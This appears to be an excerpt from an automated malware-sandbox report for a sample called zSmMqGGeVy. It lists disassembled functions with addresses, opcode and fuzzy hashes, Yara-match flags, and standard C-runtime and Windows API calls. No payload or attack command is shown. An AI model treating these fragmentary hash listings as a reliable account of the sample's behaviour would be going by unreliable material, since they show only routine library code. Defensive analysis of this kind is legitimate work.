                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f8ff1b8878eeee25ef712a8cf91bf0102ce09dd43be7e5d889e16a744a1aea2
                                                  • Instruction ID: 23d9894d054f4eb203478e84832b11d50b0911d389ea7e4cd0ce97672871e734
                                                  • Opcode Fuzzy Hash: 2f8ff1b8878eeee25ef712a8cf91bf0102ce09dd43be7e5d889e16a744a1aea2
                                                  • Instruction Fuzzy Hash: ED615CF7A193089FF3086E29DC4533ABBD6EBE0320F1A853DD7C547788EA3A54058646
                                                  Function 00912C4C Relevance: .2, Instructions: 195COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0ed583dbc36ebe6e613586891d96e298a915ad77bf9d04b54c2110e803b33a12
                                                  • Instruction ID: 6a378f333e69c2b24c982dc4c9be44894bd07839ca38d2455f97d1b9615ff484
                                                  • Opcode Fuzzy Hash: 0ed583dbc36ebe6e613586891d96e298a915ad77bf9d04b54c2110e803b33a12
                                                  • Instruction Fuzzy Hash: CC617FF7FA16210BF35848B8DD993B26542DB95314F2F82788F1DAB7C6C8BD4D095288
                                                  Function 0081B33D Relevance: .1, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 38ae250097be9872aba5b7e944ddffd2fdae440588548733454d0af9a542ea27
                                                  • Instruction ID: 438dda17441f5e4c7fdeb7946b99bc67690a40b8918f19ac2c3c1add50b39e2c
                                                  • Opcode Fuzzy Hash: 38ae250097be9872aba5b7e944ddffd2fdae440588548733454d0af9a542ea27
                                                  • Instruction Fuzzy Hash: 6A41A2F3F1122547F3140938CC693A26693DBE0324F2F42798B69ABBCAD97E9D455284
                                                  Function 00866D5E Relevance: .1, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca06bd75cf1347c2308e6d499e25ea334fb01a63a13af2648856e36f3eb4f4cb
                                                  • Instruction ID: 43f3cdfc623fed477009d073b62315766b572dab0eac0a3059736876756f53bb
                                                  • Opcode Fuzzy Hash: ca06bd75cf1347c2308e6d499e25ea334fb01a63a13af2648856e36f3eb4f4cb
                                                  • Instruction Fuzzy Hash: BB4147F36086105FE318AA2CEC567BBBBD5DF80720F1A453DEAC587780E57D584082C6
                                                  Function 0041A512 Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                  • Instruction ID: 1ad9d6d7365e600a7bb69782b0834f4d420f3f91d9e0c3ac1aa475b9fcfe298e
                                                  • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                  • Instruction Fuzzy Hash: 6521B673F2043947770CC57ECC522BDB6E1C78C501745423AE8A6EA2C1D96CD917E2E4
                                                  Function 00EAA779 Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                  • Instruction ID: 0a816d299109a14b009162e0e42b1fa72d6359e160fe972eaeda59e5a63c09e2
                                                  • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                  • Instruction Fuzzy Hash: 2421B373F205394B7B0CC57E8C562BDB6E1C78C601745823AF8A6EA2C1D96CD917E2E4
                                                  Function 0082C71D Relevance: .1, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c927d91102be62d1827db1ce6d65ee8b96c9e82816e54447f83e261f936a85a
                                                  • Instruction ID: 94eda337af5fa2d9084e33ff7e1fe11f030f6cdfd8c97fbef216b9debcdd78c0
                                                  • Opcode Fuzzy Hash: 7c927d91102be62d1827db1ce6d65ee8b96c9e82816e54447f83e261f936a85a
                                                  • Instruction Fuzzy Hash: 2831ADF3E916254BF35449A8CC843A2A642DB90324F2F82748F5C7B7C5D9BE5C4652C4
                                                  Function 009B5C20 Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8143e330ff80781cb9678002a09d3e3eaa3ea8e7696f9e79b54646b0747a7220
                                                  • Instruction ID: ce4e8ea7f1ad6279089d20637aa760480922fbfe93ddf761284575852778f53d
                                                  • Opcode Fuzzy Hash: 8143e330ff80781cb9678002a09d3e3eaa3ea8e7696f9e79b54646b0747a7220
                                                  • Instruction Fuzzy Hash: 3831E4B250C7149FE355BF69D8856AAFBE4FF48720F06082DE6D483640EA3554408B97
                                                  Function 0041A3F2 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                  • Instruction ID: f1e66852e6b8581706c01849561528f719d4aeccf6fe4fc0aff0fb2656777429
                                                  • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                  • Instruction Fuzzy Hash: D6118A73F30C255B675C816D8C172BAA5D2EBDC25074F533AD826E7284E998DE23D290
                                                  Function 00EAA659 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                  • Instruction ID: bbabd113150c8cc7392f6626ae216aba2730eb612006632e83f0984af56b7ae9
                                                  • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                  • Instruction Fuzzy Hash: B7118A73F30C255B675C816D8C172BAA5D2DBDC25074F533AD826EB384E994DE13D290
                                                  Function 0040A960 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: bf3d62387290270b8e9c206f9b330aa6ec5fad9da35dacc9460757c01b80fc97
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: 43115EF730038143D704862EC5B45B7E395EBC6321B2F4B7BC0825B7C8C23A9865E50A
                                                  Function 00E9ABC7 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: fa04fb7d5486a7511cc498eb8f444bcdb2ded702a6a04d0a4875ef98889d01c4
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: 541157B720004243DE54CA3DD5B42BAE396EFC6328B2C767AD0426F348D222ED44D682
                                                  Function 100102A0 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                                  Function 00DA9D3B Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598451673.0000000000DA9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DA9000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_da9000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction ID: 8f8ba5eed60a2e464aa12d50d2779ccf17a1b66bd6cd5fb96a891714453dd2a2
                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction Fuzzy Hash: 46117CB2340100AFDB54DF59DC91FA6B3EAEB89330B298069E908CB316D675E842C760
                                                  Function 00E90D90 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction ID: 87223ad73358a1a5baf0e5813e2009193d2e10e63e5795ab16bde2ab12abcf3a
                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction Fuzzy Hash: 1301D676A006048FDF21CF64C804BAA33F5FB8631AF8544B5D90AF7281E774A941CB90
                                                  Function 00A930C8 Relevance: .0, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000A92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A92000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a92000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fbc087d86986e6736eebb06f85375ab913284561c4857e37f255e00d3a5a12fe
                                                  • Instruction ID: b779d6ceb6c47a0d4c9e02bf746b339627fb539ba850f2e69f46cbf0e534b1b9
                                                  • Opcode Fuzzy Hash: fbc087d86986e6736eebb06f85375ab913284561c4857e37f255e00d3a5a12fe
                                                  • Instruction Fuzzy Hash: 12F02E7B3442012EDF108EA5AA65BFEB7B5E782720F34800AF004C1013D2800B151222
                                                  Function 0041366F Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                  • Instruction ID: fd5c11342e53f5fd9e78528a8d63764efe72d1229905d7d1658511e5362cd08d
                                                  • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                  • Instruction Fuzzy Hash: EEE04632911228EBCB24DF898A08A8AF3ACEB44B09B11049AB501D3210C274DE80C7D4
                                                  Function 00EA38D6 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                  • Instruction ID: 545d4294fb09cea3108a2138b1e80439c49707e38e75c3586403cb83c89e4ef3
                                                  • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                  • Instruction Fuzzy Hash: 0CE08C72921228EBCB24DB98C905D8AF3FCEB4AB40F118096B901E7140C270EF00C7D0
                                                  Function 10007A76 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                  • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                                  • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                  • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                                  Function 00409088 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00409066), ref: 00409094
                                                  • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409066), ref: 0040909F
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409066), ref: 004090B0
                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004090C2
                                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004090D0
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409066), ref: 004090F3
                                                  • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 0040910F
                                                  • CloseHandle.KERNEL32(00000000,?,?,00409066), ref: 0040911F
                                                  Strings
                                                  • SleepConditionVariableCS, xrefs: 004090BC
                                                  • kernel32.dll, xrefs: 004090AB
                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040909A
                                                  • WakeAllConditionVariable, xrefs: 004090C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                  • API String ID: 2565136772-3242537097
                                                  • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                  • Instruction ID: acc3deda13f420712ce33b53dd37b90dad73ad81c8ab949137041f64949c0d3f
                                                  • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                  • Instruction Fuzzy Hash: 410196B1F40322ABE7202B75AD0DB963B989B4CB01B154036FD15E2295D77CCC01866D
                                                  Function 004171E3 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 00417227
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F00
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F12
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F24
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F36
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F48
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F5A
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F6C
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F7E
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F90
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FA2
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FB4
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FC6
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FD8
                                                  • _free.LIBCMT ref: 0041721C
                                                    • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                    • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                  • _free.LIBCMT ref: 0041723E
                                                  • _free.LIBCMT ref: 00417253
                                                  • _free.LIBCMT ref: 0041725E
                                                  • _free.LIBCMT ref: 00417280
                                                  • _free.LIBCMT ref: 00417293
                                                  • _free.LIBCMT ref: 004172A1
                                                  • _free.LIBCMT ref: 004172AC
                                                  • _free.LIBCMT ref: 004172E4
                                                  • _free.LIBCMT ref: 004172EB
                                                  • _free.LIBCMT ref: 00417308
                                                  • _free.LIBCMT ref: 00417320
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                                  • Instruction ID: edf7faae9d3bf0885fb7c5c7e3fb72ef0fb286978f56b7ec46c8a8d77fdb3eda
                                                  • Opcode Fuzzy Hash: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                                  • Instruction Fuzzy Hash: A1313D31608204ABEB21AB7AD845BD777F4AF41354F24885BF559D7261EE38ECC1C628
                                                  Function 00EA744A Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 00EA748E
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA7167
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA7179
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA718B
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA719D
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA71AF
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA71C1
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA71D3
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA71E5
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA71F7
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA7209
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA721B
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA722D
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA723F
                                                  • _free.LIBCMT ref: 00EA7483
                                                    • Part of subcall function 00EA1D29: HeapFree.KERNEL32(00000000,00000000,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?), ref: 00EA1D3F
                                                    • Part of subcall function 00EA1D29: GetLastError.KERNEL32(?,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?,?), ref: 00EA1D51
                                                  • _free.LIBCMT ref: 00EA74A5
                                                  • _free.LIBCMT ref: 00EA74BA
                                                  • _free.LIBCMT ref: 00EA74C5
                                                  • _free.LIBCMT ref: 00EA74E7
                                                  • _free.LIBCMT ref: 00EA74FA
                                                  • _free.LIBCMT ref: 00EA7508
                                                  • _free.LIBCMT ref: 00EA7513
                                                  • _free.LIBCMT ref: 00EA754B
                                                  • _free.LIBCMT ref: 00EA7552
                                                  • _free.LIBCMT ref: 00EA756F
                                                  • _free.LIBCMT ref: 00EA7587
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                  • Instruction ID: 09b6f213e50c82812be019502d49872f3c575876eaf3757ad1e1bd588172dc38
                                                  • Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                  • Instruction Fuzzy Hash: E8319032A082059FDB25AA38DC05B5677E9EF0E315F116869F4A8FF191DB34FC808721
                                                  Function 1000A001 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 1000A045
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515
                                                  • _free.LIBCMT ref: 1000A03A
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 1000A05C
                                                  • _free.LIBCMT ref: 1000A071
                                                  • _free.LIBCMT ref: 1000A07C
                                                  • _free.LIBCMT ref: 1000A09E
                                                  • _free.LIBCMT ref: 1000A0B1
                                                  • _free.LIBCMT ref: 1000A0BF
                                                  • _free.LIBCMT ref: 1000A0CA
                                                  • _free.LIBCMT ref: 1000A102
                                                  • _free.LIBCMT ref: 1000A109
                                                  • _free.LIBCMT ref: 1000A126
                                                  • _free.LIBCMT ref: 1000A13E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
